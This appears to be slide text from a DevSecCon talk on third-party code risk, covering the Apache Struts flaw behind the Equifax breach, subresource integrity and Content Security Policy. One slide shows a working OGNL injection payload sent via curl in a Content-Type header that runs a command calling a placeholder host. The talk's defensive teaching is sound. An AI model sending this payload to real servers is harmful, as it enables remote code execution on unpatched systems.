Join the conversation #DevSecCon
BY TIM KADLEC @TKADLEC
Their Problems Are Your Problems
HELL IS OTHER PEOPLE’S CODE
CONTEXT
OPINIONS
ASSUMPTIONS
WEB IS POWERED BY OTHER PEOPLE’S CODE
9 MILLION Different Users
28% More artifacts indexed in past year
23,411,471 Packages downloaded per month
HUGE BOOST FOR PRODUCTIVITY
1,000 DEPENDENCIES
~5 CONTRIBUTORS
5,000 DEVELOPERS
OFFLOAD THE WORK, but not the RISK
OFFLOAD THE WORK, but not the RESPONSIBILITY
http://bit.ly/struts-vuln
http://bit.ly/snyk-struts
curl http://demo/struts -H "Content-Type: % {(#_='multipart/form-data'). (#[email protected]@DEFAULT_MEMBER_ACCESS). (@java.lang.Runtime@getRuntime().exec('curl badurl.com'))}"
public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException {
    ...
    if (content_type != null && content_type.contains("multipart/form-data")) {
        ...
        request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider, disableRequestAttributeValueStackLookup);
    } else {
        request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup);
    }
    return request;
}
String errorMessage = buildErrorMessage(e, new Object[]{e.getPermittedSize(), e.getActualSize()});
MARCH 6: FIXED VERSION RELEASED
MARCH 7: EXPLOIT SCRIPTS APPEAR
MAY 13-JULY 30: EQUIFAX BREACH
SEPTEMBER 7: BREACH ANNOUNCED
[Chart: OPEN-SOURCE LIBRARY VULNS BY YEAR, 2007 to 2017]
“The human error was that the individual who’s responsible for communicating in the organization to apply the patch, did not.”
EVERYONE’S RESPONSIBILITY
LAYERS OF DEFENSE
77% USE A VULNERABLE JS LIBRARY
http://bit.ly/lh-audit
http://bit.ly/sonarwhal
~35% Third-Party Resources (2013)
~53% Third-Party Resources (2017)
77-99% Third-Party Resources
38% of sites
SAME-ORIGIN POLICY
ORIGIN: SCHEME + HOSTNAME + PORT
http://foo.com/index.html compared with:
http://foo.com/about.html      same origin (only the path differs)
https://foo.com/index.html     different scheme
http://a.foo.com/about.html    different hostname
http://foo.com:80/about.html   same origin (80 is the default port for http)
http://foo.com:81/about.html   different port
--disable-web-security
about:blank
javascript:
var xhr = new XMLHttpRequest();
xhr.open('GET', "https://www.devseccon.com/");
xhr.send();
<script src="..."></script>
<img src="..." />
<link href="..." />
SUBRESOURCE INTEGRITY
<script src="https://foo.com/framework.js" integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC"></script>
CONTENT SECURITY POLICY (CSP)
SAME-ORIGIN POLICY?
WHITELIST
Content-Security-Policy: policy;
Content-Security-Policy: resource-directive source-list;
Content-Security-Policy: script-src 'self' https://apis.google.com;
base-uri child-src connect-src font-src form-action frame-ancestors img-src
media-src object-src plugin-types report-uri style-src script-src upgrade-insecure-requests
Content-Security-Policy: default-src 'self';
'none' 'self' 'unsafe-inline' 'unsafe-eval'
Content-Security-Policy: default-src 'self'; script-src 'nonce-2726c7f26c'
<script nonce="2726c7f26c"> alert(123); </script>
Content-Security-Policy: script-src 'sha256-cLuU6nVzrYJlo7rUa6PFrPQrEUpOHllb5ic='
Content-Security-Policy-Report-Only:
CONTENT-SECURITY-POLICY:
  default-src 'none';
  base-uri 'self';
  block-all-mixed-content;
  child-src render.githubusercontent.com;
  connect-src 'self' uploads.github.com status.github.com api.github.com www.google-analytics.com wss://live.github.com;
  font-src assets-cdn.github.com;
  form-action 'self' github.com gist.github.com;
  frame-ancestors 'none';
  frame-src render.githubusercontent.com;
  img-src 'self' data: assets-cdn.github.com identicons.github.com www.google-analytics.com collector.githubapp.com *.gravatar.com *.wp.com *.githubusercontent.com;
  media-src 'none';
  object-src assets-cdn.github.com;
  plugin-types application/x-shockwave-flash;
  script-src assets-cdn.github.com;
  style-src 'unsafe-inline' assets-cdn.github.com
Content-Security-Policy-Report-Only: default-src https:; form-action https:; report-uri https://myreport.com;
Content-Security-Policy: default-src https:; form-action https:; report-uri https://myreport.com;
SERVERLESS & PAAS
UNPATCHED SERVERS
COMPROMISED SERVERS
WHAT’S THE PATH OF LEAST RESISTANCE?
http://bit.ly/bucket-finder
SECURE BY DEFAULT
OFFLOAD THE WORK, but not the RESPONSIBILITY
REAL PEOPLE PAYING THE PRICE
http://bit.ly/owasp-cloud
SYSTEM CONFIGURATION NETWORK LAYER FRONT-END CODE BACK-END COMPONENTS THIRD-PARTY SERVICES
LAYERS OF DEFENSE
EVERYONE’S RESPONSIBILITY
BRING SECURITY TO THE TEAM
WEB IS POWERED BY OTHER PEOPLE’S CODE
WEB’S SAFETY & STABILITY
IS UP TO US
Thank you! Tim Kadlec | @tkadlec